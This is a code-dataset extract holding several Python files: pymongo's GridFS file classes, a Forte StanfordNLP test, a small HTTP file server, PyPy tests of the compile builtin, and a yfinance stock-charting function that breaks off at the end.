max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
gridfs/grid_file.py
naomielst/mongo-python-driver
2
5500
# Copyright 2009-present MongoDB, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tools for representing files stored in GridFS.""" import datetime import io import math import os from bson.int64 import Int64 from bson.son import SON from bson.binary import Binary from bson.objectid import ObjectId from pymongo import ASCENDING from pymongo.collection import Collection from pymongo.cursor import Cursor from pymongo.errors import (ConfigurationError, CursorNotFound, DuplicateKeyError, InvalidOperation, OperationFailure) from pymongo.read_preferences import ReadPreference from gridfs.errors import CorruptGridFile, FileExists, NoFile try: _SEEK_SET = os.SEEK_SET _SEEK_CUR = os.SEEK_CUR _SEEK_END = os.SEEK_END # before 2.5 except AttributeError: _SEEK_SET = 0 _SEEK_CUR = 1 _SEEK_END = 2 EMPTY = b"" NEWLN = b"\n" """Default chunk size, in bytes.""" # Slightly under a power of 2, to work well with server's record allocations. DEFAULT_CHUNK_SIZE = 255 * 1024 _C_INDEX = SON([("files_id", ASCENDING), ("n", ASCENDING)]) _F_INDEX = SON([("filename", ASCENDING), ("uploadDate", ASCENDING)]) def _grid_in_property(field_name, docstring, read_only=False, closed_only=False): """Create a GridIn property.""" def getter(self): if closed_only and not self._closed: raise AttributeError("can only get %r on a closed file" % field_name) # Protect against PHP-237 if field_name == 'length': return self._file.get(field_name, 0) return self._file.get(field_name, None) def setter(self, value): if self._closed: self._coll.files.update_one({"_id": self._file["_id"]}, {"$set": {field_name: value}}) self._file[field_name] = value if read_only: docstring += "\n\nThis attribute is read-only." elif closed_only: docstring = "%s\n\n%s" % (docstring, "This attribute is read-only and " "can only be read after :meth:`close` " "has been called.") if not read_only and not closed_only: return property(getter, setter, doc=docstring) return property(getter, doc=docstring) def _grid_out_property(field_name, docstring): """Create a GridOut property.""" def getter(self): self._ensure_file() # Protect against PHP-237 if field_name == 'length': return self._file.get(field_name, 0) return self._file.get(field_name, None) docstring += "\n\nThis attribute is read-only." return property(getter, doc=docstring) def _clear_entity_type_registry(entity, **kwargs): """Clear the given database/collection object's type registry.""" codecopts = entity.codec_options.with_options(type_registry=None) return entity.with_options(codec_options=codecopts, **kwargs) def _disallow_transactions(session): if session and session.in_transaction: raise InvalidOperation( 'GridFS does not support multi-document transactions') class GridIn(object): """Class to write data to GridFS. """ def __init__(self, root_collection, session=None, **kwargs): """Write a file to GridFS Application developers should generally not need to instantiate this class directly - instead see the methods provided by :class:`~gridfs.GridFS`. Raises :class:`TypeError` if `root_collection` is not an instance of :class:`~pymongo.collection.Collection`. Any of the file level options specified in the `GridFS Spec <http://dochub.mongodb.org/core/gridfsspec>`_ may be passed as keyword arguments. Any additional keyword arguments will be set as additional fields on the file document. Valid keyword arguments include: - ``"_id"``: unique ID for this file (default: :class:`~bson.objectid.ObjectId`) - this ``"_id"`` must not have already been used for another file - ``"filename"``: human name for the file - ``"contentType"`` or ``"content_type"``: valid mime-type for the file - ``"chunkSize"`` or ``"chunk_size"``: size of each of the chunks, in bytes (default: 255 kb) - ``"encoding"``: encoding used for this file. Any :class:`str` that is written to the file will be converted to :class:`bytes`. :Parameters: - `root_collection`: root collection to write to - `session` (optional): a :class:`~pymongo.client_session.ClientSession` to use for all commands - `**kwargs` (optional): file level options (see above) .. versionchanged:: 4.0 Removed the `disable_md5` parameter. See :ref:`removed-gridfs-checksum` for details. .. versionchanged:: 3.7 Added the `disable_md5` parameter. .. versionchanged:: 3.6 Added ``session`` parameter. .. versionchanged:: 3.0 `root_collection` must use an acknowledged :attr:`~pymongo.collection.Collection.write_concern` """ if not isinstance(root_collection, Collection): raise TypeError("root_collection must be an " "instance of Collection") if not root_collection.write_concern.acknowledged: raise ConfigurationError('root_collection must use ' 'acknowledged write_concern') _disallow_transactions(session) # Handle alternative naming if "content_type" in kwargs: kwargs["contentType"] = kwargs.pop("content_type") if "chunk_size" in kwargs: kwargs["chunkSize"] = kwargs.pop("chunk_size") coll = _clear_entity_type_registry( root_collection, read_preference=ReadPreference.PRIMARY) # Defaults kwargs["_id"] = kwargs.get("_id", ObjectId()) kwargs["chunkSize"] = kwargs.get("chunkSize", DEFAULT_CHUNK_SIZE) object.__setattr__(self, "_session", session) object.__setattr__(self, "_coll", coll) object.__setattr__(self, "_chunks", coll.chunks) object.__setattr__(self, "_file", kwargs) object.__setattr__(self, "_buffer", io.BytesIO()) object.__setattr__(self, "_position", 0) object.__setattr__(self, "_chunk_number", 0) object.__setattr__(self, "_closed", False) object.__setattr__(self, "_ensured_index", False) def __create_index(self, collection, index_key, unique): doc = collection.find_one(projection={"_id": 1}, session=self._session) if doc is None: try: index_keys = [index_spec['key'] for index_spec in collection.list_indexes(session=self._session)] except OperationFailure: index_keys = [] if index_key not in index_keys: collection.create_index( index_key.items(), unique=unique, session=self._session) def __ensure_indexes(self): if not object.__getattribute__(self, "_ensured_index"): _disallow_transactions(self._session) self.__create_index(self._coll.files, _F_INDEX, False) self.__create_index(self._coll.chunks, _C_INDEX, True) object.__setattr__(self, "_ensured_index", True) def abort(self): """Remove all chunks/files that may have been uploaded and close. """ self._coll.chunks.delete_many( {"files_id": self._file['_id']}, session=self._session) self._coll.files.delete_one( {"_id": self._file['_id']}, session=self._session) object.__setattr__(self, "_closed", True) @property def closed(self): """Is this file closed? """ return self._closed _id = _grid_in_property("_id", "The ``'_id'`` value for this file.", read_only=True) filename = _grid_in_property("filename", "Name of this file.") name = _grid_in_property("filename", "Alias for `filename`.") content_type = _grid_in_property("contentType", "Mime-type for this file.") length = _grid_in_property("length", "Length (in bytes) of this file.", closed_only=True) chunk_size = _grid_in_property("chunkSize", "Chunk size for this file.", read_only=True) upload_date = _grid_in_property("uploadDate", "Date that this file was uploaded.", closed_only=True) md5 = _grid_in_property("md5", "MD5 of the contents of this file " "if an md5 sum was created.", closed_only=True) def __getattr__(self, name): if name in self._file: return self._file[name] raise AttributeError("GridIn object has no attribute '%s'" % name) def __setattr__(self, name, value): # For properties of this instance like _buffer, or descriptors set on # the class like filename, use regular __setattr__ if name in self.__dict__ or name in self.__class__.__dict__: object.__setattr__(self, name, value) else: # All other attributes are part of the document in db.fs.files. # Store them to be sent to server on close() or if closed, send # them now. self._file[name] = value if self._closed: self._coll.files.update_one({"_id": self._file["_id"]}, {"$set": {name: value}}) def __flush_data(self, data): """Flush `data` to a chunk. """ self.__ensure_indexes() if not data: return assert(len(data) <= self.chunk_size) chunk = {"files_id": self._file["_id"], "n": self._chunk_number, "data": Binary(data)} try: self._chunks.insert_one(chunk, session=self._session) except DuplicateKeyError: self._raise_file_exists(self._file['_id']) self._chunk_number += 1 self._position += len(data) def __flush_buffer(self): """Flush the buffer contents out to a chunk. """ self.__flush_data(self._buffer.getvalue()) self._buffer.close() self._buffer = io.BytesIO() def __flush(self): """Flush the file to the database. """ try: self.__flush_buffer() # The GridFS spec says length SHOULD be an Int64. self._file["length"] = Int64(self._position) self._file["uploadDate"] = datetime.datetime.utcnow() return self._coll.files.insert_one( self._file, session=self._session) except DuplicateKeyError: self._raise_file_exists(self._id) def _raise_file_exists(self, file_id): """Raise a FileExists exception for the given file_id.""" raise FileExists("file with _id %r already exists" % file_id) def close(self): """Flush the file and close it. A closed file cannot be written any more. Calling :meth:`close` more than once is allowed. """ if not self._closed: self.__flush() object.__setattr__(self, "_closed", True) def read(self, size=-1): raise io.UnsupportedOperation('read') def readable(self): return False def seekable(self): return False def write(self, data): """Write data to the file. There is no return value. `data` can be either a string of bytes or a file-like object (implementing :meth:`read`). If the file has an :attr:`encoding` attribute, `data` can also be a :class:`str` instance, which will be encoded as :attr:`encoding` before being written. Due to buffering, the data may not actually be written to the database until the :meth:`close` method is called. Raises :class:`ValueError` if this file is already closed. Raises :class:`TypeError` if `data` is not an instance of :class:`bytes`, a file-like object, or an instance of :class:`str`. Unicode data is only allowed if the file has an :attr:`encoding` attribute. :Parameters: - `data`: string of bytes or file-like object to be written to the file """ if self._closed: raise ValueError("cannot write to a closed file") try: # file-like read = data.read except AttributeError: # string if not isinstance(data, (str, bytes)): raise TypeError("can only write strings or file-like objects") if isinstance(data, str): try: data = data.encode(self.encoding) except AttributeError: raise TypeError("must specify an encoding for file in " "order to write str") read = io.BytesIO(data).read if self._buffer.tell() > 0: # Make sure to flush only when _buffer is complete space = self.chunk_size - self._buffer.tell() if space: try: to_write = read(space) except: self.abort() raise self._buffer.write(to_write) if len(to_write) < space: return # EOF or incomplete self.__flush_buffer() to_write = read(self.chunk_size) while to_write and len(to_write) == self.chunk_size: self.__flush_data(to_write) to_write = read(self.chunk_size) self._buffer.write(to_write) def writelines(self, sequence): """Write a sequence of strings to the file. Does not add seperators. """ for line in sequence: self.write(line) def writeable(self): return True def __enter__(self): """Support for the context manager protocol. """ return self def __exit__(self, exc_type, exc_val, exc_tb): """Support for the context manager protocol. Close the file and allow exceptions to propagate. """ self.close() # propagate exceptions return False class GridOut(io.IOBase): """Class to read data out of GridFS. """ def __init__(self, root_collection, file_id=None, file_document=None, session=None): """Read a file from GridFS Application developers should generally not need to instantiate this class directly - instead see the methods provided by :class:`~gridfs.GridFS`. Either `file_id` or `file_document` must be specified, `file_document` will be given priority if present. Raises :class:`TypeError` if `root_collection` is not an instance of :class:`~pymongo.collection.Collection`. :Parameters: - `root_collection`: root collection to read from - `file_id` (optional): value of ``"_id"`` for the file to read - `file_document` (optional): file document from `root_collection.files` - `session` (optional): a :class:`~pymongo.client_session.ClientSession` to use for all commands .. versionchanged:: 3.8 For better performance and to better follow the GridFS spec, :class:`GridOut` now uses a single cursor to read all the chunks in the file. .. versionchanged:: 3.6 Added ``session`` parameter. .. versionchanged:: 3.0 Creating a GridOut does not immediately retrieve the file metadata from the server. Metadata is fetched when first needed. """ if not isinstance(root_collection, Collection): raise TypeError("root_collection must be an " "instance of Collection") _disallow_transactions(session) root_collection = _clear_entity_type_registry(root_collection) super().__init__() self.__chunks = root_collection.chunks self.__files = root_collection.files self.__file_id = file_id self.__buffer = EMPTY self.__chunk_iter = None self.__position = 0 self._file = file_document self._session = session _id = _grid_out_property("_id", "The ``'_id'`` value for this file.") filename = _grid_out_property("filename", "Name of this file.") name = _grid_out_property("filename", "Alias for `filename`.") content_type = _grid_out_property("contentType", "Mime-type for this file.") length = _grid_out_property("length", "Length (in bytes) of this file.") chunk_size = _grid_out_property("chunkSize", "Chunk size for this file.") upload_date = _grid_out_property("uploadDate", "Date that this file was first uploaded.") aliases = _grid_out_property("aliases", "List of aliases for this file.") metadata = _grid_out_property("metadata", "Metadata attached to this file.") md5 = _grid_out_property("md5", "MD5 of the contents of this file " "if an md5 sum was created.") def _ensure_file(self): if not self._file: _disallow_transactions(self._session) self._file = self.__files.find_one({"_id": self.__file_id}, session=self._session) if not self._file: raise NoFile("no file in gridfs collection %r with _id %r" % (self.__files, self.__file_id)) def __getattr__(self, name): self._ensure_file() if name in self._file: return self._file[name] raise AttributeError("GridOut object has no attribute '%s'" % name) def readable(self): return True def readchunk(self): """Reads a chunk at a time. If the current position is within a chunk the remainder of the chunk is returned. """ received = len(self.__buffer) chunk_data = EMPTY chunk_size = int(self.chunk_size) if received > 0: chunk_data = self.__buffer elif self.__position < int(self.length): chunk_number = int((received + self.__position) / chunk_size) if self.__chunk_iter is None: self.__chunk_iter = _GridOutChunkIterator( self, self.__chunks, self._session, chunk_number) chunk = self.__chunk_iter.next() chunk_data = chunk["data"][self.__position % chunk_size:] if not chunk_data: raise CorruptGridFile("truncated chunk") self.__position += len(chunk_data) self.__buffer = EMPTY return chunk_data def read(self, size=-1): """Read at most `size` bytes from the file (less if there isn't enough data). The bytes are returned as an instance of :class:`str` (:class:`bytes` in python 3). If `size` is negative or omitted all data is read. :Parameters: - `size` (optional): the number of bytes to read .. versionchanged:: 3.8 This method now only checks for extra chunks after reading the entire file. Previously, this method would check for extra chunks on every call. """ self._ensure_file() remainder = int(self.length) - self.__position if size < 0 or size > remainder: size = remainder if size == 0: return EMPTY received = 0 data = io.BytesIO() while received < size: chunk_data = self.readchunk() received += len(chunk_data) data.write(chunk_data) # Detect extra chunks after reading the entire file. if size == remainder and self.__chunk_iter: try: self.__chunk_iter.next() except StopIteration: pass self.__position -= received - size # Return 'size' bytes and store the rest. data.seek(size) self.__buffer = data.read() data.seek(0) return data.read(size) def readline(self, size=-1): """Read one line or up to `size` bytes from the file. :Parameters: - `size` (optional): the maximum number of bytes to read """ remainder = int(self.length) - self.__position if size < 0 or size > remainder: size = remainder if size == 0: return EMPTY received = 0 data = io.BytesIO() while received < size: chunk_data = self.readchunk() pos = chunk_data.find(NEWLN, 0, size) if pos != -1: size = received + pos + 1 received += len(chunk_data) data.write(chunk_data) if pos != -1: break self.__position -= received - size # Return 'size' bytes and store the rest. data.seek(size) self.__buffer = data.read() data.seek(0) return data.read(size) def tell(self): """Return the current position of this file. """ return self.__position def seek(self, pos, whence=_SEEK_SET): """Set the current position of this file. :Parameters: - `pos`: the position (or offset if using relative positioning) to seek to - `whence` (optional): where to seek from. :attr:`os.SEEK_SET` (``0``) for absolute file positioning, :attr:`os.SEEK_CUR` (``1``) to seek relative to the current position, :attr:`os.SEEK_END` (``2``) to seek relative to the file's end. """ if whence == _SEEK_SET: new_pos = pos elif whence == _SEEK_CUR: new_pos = self.__position + pos elif whence == _SEEK_END: new_pos = int(self.length) + pos else: raise IOError(22, "Invalid value for `whence`") if new_pos < 0: raise IOError(22, "Invalid value for `pos` - must be positive") # Optimization, continue using the same buffer and chunk iterator. if new_pos == self.__position: return self.__position = new_pos self.__buffer = EMPTY if self.__chunk_iter: self.__chunk_iter.close() self.__chunk_iter = None def seekable(self): return True def __iter__(self): """Return an iterator over all of this file's data. The iterator will return lines (delimited by ``b'\\n'``) of :class:`bytes`. This can be useful when serving files using a webserver that handles such an iterator efficiently. .. versionchanged:: 3.8 The iterator now raises :class:`CorruptGridFile` when encountering any truncated, missing, or extra chunk in a file. The previous behavior was to only raise :class:`CorruptGridFile` on a missing chunk. .. versionchanged:: 4.0 The iterator now iterates over *lines* in the file, instead of chunks, to conform to the base class :py:class:`io.IOBase`. Use :meth:`GridOut.readchunk` to read chunk by chunk instead of line by line. """ return self def close(self): """Make GridOut more generically file-like.""" if self.__chunk_iter: self.__chunk_iter.close() self.__chunk_iter = None super().close() def write(self, value): raise io.UnsupportedOperation('write') def writelines(self, lines): raise io.UnsupportedOperation('writelines') def writable(self): return False def __enter__(self): """Makes it possible to use :class:`GridOut` files with the context manager protocol. """ return self def __exit__(self, exc_type, exc_val, exc_tb): """Makes it possible to use :class:`GridOut` files with the context manager protocol. """ self.close() return False def fileno(self): raise io.UnsupportedOperation('fileno') def flush(self): # GridOut is read-only, so flush does nothing. pass def isatty(self): return False def truncate(self, size=None): # See https://docs.python.org/3/library/io.html#io.IOBase.writable # for why truncate has to raise. raise io.UnsupportedOperation('truncate') # Override IOBase.__del__ otherwise it will lead to __getattr__ on # __IOBase_closed which calls _ensure_file and potentially performs I/O. # We cannot do I/O in __del__ since it can lead to a deadlock. def __del__(self): pass class _GridOutChunkIterator(object): """Iterates over a file's chunks using a single cursor. Raises CorruptGridFile when encountering any truncated, missing, or extra chunk in a file. """ def __init__(self, grid_out, chunks, session, next_chunk): self._id = grid_out._id self._chunk_size = int(grid_out.chunk_size) self._length = int(grid_out.length) self._chunks = chunks self._session = session self._next_chunk = next_chunk self._num_chunks = math.ceil(float(self._length) / self._chunk_size) self._cursor = None def expected_chunk_length(self, chunk_n): if chunk_n < self._num_chunks - 1: return self._chunk_size return self._length - (self._chunk_size * (self._num_chunks - 1)) def __iter__(self): return self def _create_cursor(self): filter = {"files_id": self._id} if self._next_chunk > 0: filter["n"] = {"$gte": self._next_chunk} _disallow_transactions(self._session) self._cursor = self._chunks.find(filter, sort=[("n", 1)], session=self._session) def _next_with_retry(self): """Return the next chunk and retry once on CursorNotFound. We retry on CursorNotFound to maintain backwards compatibility in cases where two calls to read occur more than 10 minutes apart (the server's default cursor timeout). """ if self._cursor is None: self._create_cursor() try: return self._cursor.next() except CursorNotFound: self._cursor.close() self._create_cursor() return self._cursor.next() def next(self): try: chunk = self._next_with_retry() except StopIteration: if self._next_chunk >= self._num_chunks: raise raise CorruptGridFile("no chunk #%d" % self._next_chunk) if chunk["n"] != self._next_chunk: self.close() raise CorruptGridFile( "Missing chunk: expected chunk #%d but found " "chunk with n=%d" % (self._next_chunk, chunk["n"])) if chunk["n"] >= self._num_chunks: # According to spec, ignore extra chunks if they are empty. if len(chunk["data"]): self.close() raise CorruptGridFile( "Extra chunk found: expected %d chunks but found " "chunk with n=%d" % (self._num_chunks, chunk["n"])) expected_length = self.expected_chunk_length(chunk["n"]) if len(chunk["data"]) != expected_length: self.close() raise CorruptGridFile( "truncated chunk #%d: expected chunk length to be %d but " "found chunk with length %d" % ( chunk["n"], expected_length, len(chunk["data"]))) self._next_chunk += 1 return chunk __next__ = next def close(self): if self._cursor: self._cursor.close() self._cursor = None class GridOutIterator(object): def __init__(self, grid_out, chunks, session): self.__chunk_iter = _GridOutChunkIterator(grid_out, chunks, session, 0) def __iter__(self): return self def next(self): chunk = self.__chunk_iter.next() return bytes(chunk["data"]) __next__ = next class GridOutCursor(Cursor): """A cursor / iterator for returning GridOut objects as the result of an arbitrary query against the GridFS files collection. """ def __init__(self, collection, filter=None, skip=0, limit=0, no_cursor_timeout=False, sort=None, batch_size=0, session=None): """Create a new cursor, similar to the normal :class:`~pymongo.cursor.Cursor`. Should not be called directly by application developers - see the :class:`~gridfs.GridFS` method :meth:`~gridfs.GridFS.find` instead. .. versionadded 2.7 .. seealso:: The MongoDB documentation on `cursors <https://dochub.mongodb.org/core/cursors>`_. """ _disallow_transactions(session) collection = _clear_entity_type_registry(collection) # Hold on to the base "fs" collection to create GridOut objects later. self.__root_collection = collection super(GridOutCursor, self).__init__( collection.files, filter, skip=skip, limit=limit, no_cursor_timeout=no_cursor_timeout, sort=sort, batch_size=batch_size, session=session) def next(self): """Get next GridOut object from cursor. """ _disallow_transactions(self.session) # Work around "super is not iterable" issue in Python 3.x next_file = super(GridOutCursor, self).next() return GridOut(self.__root_collection, file_document=next_file, session=self.session) __next__ = next def add_option(self, *args, **kwargs): raise NotImplementedError("Method does not exist for GridOutCursor") def remove_option(self, *args, **kwargs): raise NotImplementedError("Method does not exist for GridOutCursor") def _clone_base(self, session): """Creates an empty GridOutCursor for information to be copied into. """ return GridOutCursor(self.__root_collection, session=session)
2.1875
2
forte/processors/tests/stanfordnlp_processor_test.py
tcl326/forte
0
5501
"""This module tests Stanford NLP processors.""" import os import unittest from texar.torch import HParams from forte.pipeline import Pipeline from forte.data.readers import StringReader from forte.processors.stanfordnlp_processor import StandfordNLPProcessor from ft.onto.base_ontology import Token, Sentence class TestStanfordNLPProcessor(unittest.TestCase): def setUp(self): self.stanford_nlp = Pipeline() self.stanford_nlp.set_reader(StringReader()) models_path = os.getcwd() config = HParams({ "processors": "tokenize", "lang": "en", # Language code for the language to build the Pipeline "use_gpu": False }, StandfordNLPProcessor.default_hparams()) self.stanford_nlp.add_processor(StandfordNLPProcessor(models_path), config=config) self.stanford_nlp.initialize() # TODO @unittest.skip("We need to test this without needing to download models " "everytime") def test_stanford_processor(self): sentences = ["This tool is called Forte.", "The goal of this project to help you build NLP " "pipelines.", "NLP has never been made this easy before."] document = ' '.join(sentences) pack = self.stanford_nlp.process(document) print(pack)
2.65625
3
src/serve_files.py
eventh/m3u8looper
0
5502
#! /usr/bin/env python3 # -*- coding: utf-8 -*- """ Serve current folder files in a HTTP webserver. """ import socketserver from threading import Thread from http.server import SimpleHTTPRequestHandler PORT = 8000 def start_http_server(port=PORT): httpd = socketserver.TCPServer(("", port), SimpleHTTPRequestHandler) thread = Thread(target = httpd.serve_forever) thread.start() return thread if __name__ == '__main__': thread = start_http_server() thread.join()
2.90625
3
pypy/module/__builtin__/test/test_compile.py
yxzoro/pypy
0
5503
# coding: utf-8 class AppTestCompile: def test_simple(self): import sys co = compile('1+2', '?', 'eval') assert eval(co) == 3 co = compile(memoryview(b'1+2'), '?', 'eval') assert eval(co) == 3 exc = raises(ValueError, compile, chr(0), '?', 'eval') assert str(exc.value) == "source code string cannot contain null bytes" compile("from __future__ import with_statement", "<test>", "exec") raises(SyntaxError, compile, '-', '?', 'eval') raises(SyntaxError, compile, '"\\xt"', '?', 'eval') raises(ValueError, compile, '1+2', '?', 'maybenot') raises(ValueError, compile, "\n", "<string>", "exec", 0xff) raises(TypeError, compile, '1+2', 12, 34) def test_error_message(self): import re compile('# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec') compile(b'\xef\xbb\xbf\n', 'dummy', 'exec') compile(b'\xef\xbb\xbf# -*- coding: utf-8 -*-\n', 'dummy', 'exec') exc = raises(SyntaxError, compile, b'# -*- coding: fake -*-\n', 'dummy', 'exec') assert 'fake' in str(exc.value) exc = raises(SyntaxError, compile, b'\xef\xbb\xbf# -*- coding: iso-8859-15 -*-\n', 'dummy', 'exec') assert 'iso-8859-15' in str(exc.value) assert 'BOM' in str(exc.value) exc = raises(SyntaxError, compile, b'\xef\xbb\xbf# -*- coding: fake -*-\n', 'dummy', 'exec') assert 'fake' in str(exc.value) assert 'BOM' in str(exc.value) def test_unicode(self): try: compile(u'-', '?', 'eval') except SyntaxError as e: assert e.lineno == 1 def test_unicode_encoding(self): code = "# -*- coding: utf-8 -*-\npass\n" compile(code, "tmp", "exec") def test_bytes(self): code = b"# -*- coding: utf-8 -*-\npass\n" compile(code, "tmp", "exec") c = compile(b"# coding: latin1\nfoo = 'caf\xe9'\n", "<string>", "exec") ns = {} exec(c, ns) assert ns['foo'] == 'café' assert eval(b"# coding: latin1\n'caf\xe9'\n") == 'café' def test_memoryview(self): m = memoryview(b'2 + 1') co = compile(m, 'baz', 'eval') assert eval(co) == 3 assert eval(m) == 3 ns = {} exec(memoryview(b'r = 2 + 1'), ns) assert ns['r'] == 3 def test_recompile_ast(self): import _ast # raise exception when node type doesn't match with compile mode co1 = compile('print(1)', '<string>', 'exec', _ast.PyCF_ONLY_AST) raises(TypeError, compile, co1, '<ast>', 'eval') co2 = compile('1+1', '<string>', 'eval', _ast.PyCF_ONLY_AST) tree = compile(co2, '<ast>', 'eval') assert compile(co2, '<ast>', 'eval', _ast.PyCF_ONLY_AST) is co2 def test_leading_newlines(self): src = """ def fn(): pass """ co = compile(src, 'mymod', 'exec') firstlineno = co.co_firstlineno assert firstlineno == 2 def test_null_bytes(self): raises(ValueError, compile, '\x00', 'mymod', 'exec', 0) src = "#abc\x00def\n" raises(ValueError, compile, src, 'mymod', 'exec') raises(ValueError, compile, src, 'mymod', 'exec', 0) def test_null_bytes_flag(self): try: from _ast import PyCF_ACCEPT_NULL_BYTES except ImportError: skip('PyPy only (requires _ast.PyCF_ACCEPT_NULL_BYTES)') raises(SyntaxError, compile, '\x00', 'mymod', 'exec', PyCF_ACCEPT_NULL_BYTES) src = "#abc\x00def\n" compile(src, 'mymod', 'exec', PyCF_ACCEPT_NULL_BYTES) # works def test_compile_regression(self): """Clone of the part of the original test that was failing.""" import ast codestr = '''def f(): """doc""" try: assert False except AssertionError: return (True, f.__doc__) else: return (False, f.__doc__) ''' def f(): """doc""" values = [(-1, __debug__, f.__doc__), (0, True, 'doc'), (1, False, 'doc'), (2, False, None)] for optval, debugval, docstring in values: # test both direct compilation and compilation via AST codeobjs = [] codeobjs.append( compile(codestr, "<test>", "exec", optimize=optval)) tree = ast.parse(codestr) codeobjs.append(compile(tree, "<test>", "exec", optimize=optval)) for i, code in enumerate(codeobjs): print(optval, debugval, docstring, i) ns = {} exec(code, ns) rv = ns['f']() assert rv == (debugval, docstring) def test_assert_remove(self): """Test removal of the asserts with optimize=1.""" import ast code = """def f(): assert False """ tree = ast.parse(code) for to_compile in [code, tree]: compiled = compile(to_compile, "<test>", "exec", optimize=1) ns = {} exec(compiled, ns) ns['f']() def test_docstring_remove(self): """Test removal of docstrings with optimize=2.""" import ast import marshal code = """ 'module_doc' def f(): 'func_doc' class C: 'class_doc' """ tree = ast.parse(code) for to_compile in [code, tree]: compiled = compile(to_compile, "<test>", "exec", optimize=2) ns = {} exec(compiled, ns) assert '__doc__' not in ns assert ns['f'].__doc__ is None assert ns['C'].__doc__ is None # Check that the docstrings are gone from the bytecode and not just # inaccessible. marshalled = str(marshal.dumps(compiled)) assert 'module_doc' not in marshalled assert 'func_doc' not in marshalled assert 'class_doc' not in marshalled class TestOptimizeO: """Test interaction of -O flag and optimize parameter of compile.""" def setup_method(self, method): space = self.space self._sys_debug = space.sys.debug # imitate -O space.sys.debug = False def teardown_method(self, method): self.space.sys.debug = self._sys_debug def test_O_optmize_0(self): """Test that assert is not ignored if -O flag is set but optimize=0.""" space = self.space w_res = space.appexec([], """(): assert False # check that our -O imitation hack works try: exec(compile('assert False', '', 'exec', optimize=0)) except AssertionError: return True else: return False """) assert space.unwrap(w_res) def test_O_optimize__1(self): """Test that assert is ignored with -O and optimize=-1.""" space = self.space space.appexec([], """(): exec(compile('assert False', '', 'exec', optimize=-1)) """) # TODO: Check the value of __debug__ inside of the compiled block! # According to the documentation, it should follow the optimize flag. # However, cpython3.5.0a0 behaves the same way as PyPy (__debug__ follows # -O, -OO flags of the interpreter).
2.6875
3
tickers_graphing_module.py
huangbrandon432/Investing-Trading-Tool
0
5504
import yfinance as yf import matplotlib.pyplot as plt import plotly.express as px import plotly.graph_objects as go from plotly.subplots import make_subplots import pandas as pd from IPython.display import Markdown import numpy as np from datetime import date, timedelta def plot_and_get_info(ticker, start = None, end = None, ma = 'yes'): ticker_obj = yf.Ticker(ticker) ticker_hist = ticker_obj.history(period = 'max') if start and end: start_date, end_date = start, end else: start_date, end_date = ticker_hist.index[0], ticker_hist.index[-1] frame = ticker_hist.loc[start_date:end_date] closing_prices = frame['Close'] volume = frame['Volume'] fig = make_subplots(rows=2, cols=1, shared_xaxes=True, vertical_spacing=0.03, row_heights = [0.8, 0.2]) fig.add_trace(go.Scatter(x = closing_prices.index, y = closing_prices, mode = 'lines', name = 'Close'), row = 1, col = 1) if ma == 'yes': closing_prices_ma = frame['Close'].rolling(7).mean() fig.add_trace(go.Scatter(x = closing_prices_ma.index, y = closing_prices_ma, mode = 'lines', name = '7D Close Moving Average'), row = 1, col = 1) fig.add_trace(go.Bar(x = closing_prices.index, y = volume, name = 'Volume'), row=2, col=1) fig.update_xaxes(rangeslider_visible = True, rangeslider_thickness = 0.1, row=2, col=1) fig.update_yaxes(title_text="Price", row=1, col=1) fig.update_layout(title=ticker, height = 600, xaxis=dict( rangeselector=dict( buttons=list([ dict(count=7, label="1w", step="day", stepmode="backward"), dict(count=1, label="1m", step="month", stepmode="backward"), dict(count=3, label="3m", step="month", stepmode="backward"), dict(count=6, label="6m", step="month", stepmode="backward"), dict(count=1, label="YTD", step="year", stepmode="todate"), dict(count=1, label="1y", step="year", stepmode="backward"), dict(step="all") ]) ), type="date" ) ) fig.show() start_price, end_price = frame.iloc[0]['Close'], frame.iloc[-1]['Close'] def printmd(string): display(Markdown(string)) printmd('Given Timeframe:') printmd("Return: {:.2f}%".format((end_price - start_price)/start_price*100)) try: ticker_info = ticker_obj.info print() printmd('Business Summary: ' + ticker_info['longBusinessSummary']) market_cap = str(round(ticker_info['marketCap']/1000000000,2)) + 'B' longname = ticker_info['longName'] sector = ticker_info['sector'] industry = ticker_info['industry'] country = ticker_info['country'] avg10d_vol = str(round(ticker_info['averageDailyVolume10Day']/1000000,2)) + 'M' most_recent_vol = str(round(ticker_info['volume']/1000000,2)) + 'M' try: beta = round(ticker_info['beta'],2) except: beta = ticker_info['beta'] try: ps_trailing_12mo = round(ticker_info['priceToSalesTrailing12Months'],2) except: ps_trailing_12mo = ticker_info['priceToSalesTrailing12Months'] try: forwardpe = round(ticker_info['forwardPE'],2) except: forwardpe = ticker_info['forwardPE'] pegratio = ticker_info['pegRatio'] forwardeps = ticker_info['forwardEps'] trailingeps = ticker_info['trailingEps'] shares_outstanding = str(round(ticker_info['sharesOutstanding']/1000000,2)) + 'M' shares_short = str(round(ticker_info['sharesShort']/1000000,2)) + 'M' shares_short_perc_outstanding = str(round(ticker_info['sharesPercentSharesOut']*100,2)) + '%' floatshares = str(round(ticker_info['floatShares']/1000000,2)) + 'M' try: short_perc_float = str(round(ticker_info['shortPercentOfFloat']*100,2)) + '%' except: short_perc_float = ticker_info['shortPercentOfFloat'] perc_institutions = str(round(ticker_info['heldPercentInstitutions']*100,2)) + '%' perc_insiders = str(round(ticker_info['heldPercentInsiders']*100,2)) + '%' stock_info = [market_cap, longname, sector, industry, country, beta, most_recent_vol, avg10d_vol, ps_trailing_12mo, forwardpe, pegratio, forwardeps, trailingeps, shares_outstanding, perc_institutions, perc_insiders, shares_short, shares_short_perc_outstanding, floatshares, short_perc_float] stock_info_df = pd.DataFrame(stock_info, index = ['Market Cap', 'Name', 'Sector', 'Industry', 'Country', 'Beta', 'Day Volume (Most recent)', 'Avg 10D Volume', 'P/S Trailing 12mo', 'Forward P/E', 'PEG Ratio', 'Forward EPS', 'Trailing EPS', 'Shares Outstanding', 'Institutions % of Oustanding', 'Insiders % of Oustanding', 'Shares Short (Prev Mo)', 'Short % of Outstanding (Prev Mo)', 'Shares Float', 'Short % of Float (Prev Mo)'], columns = ['Info']) print() display(stock_info_df) 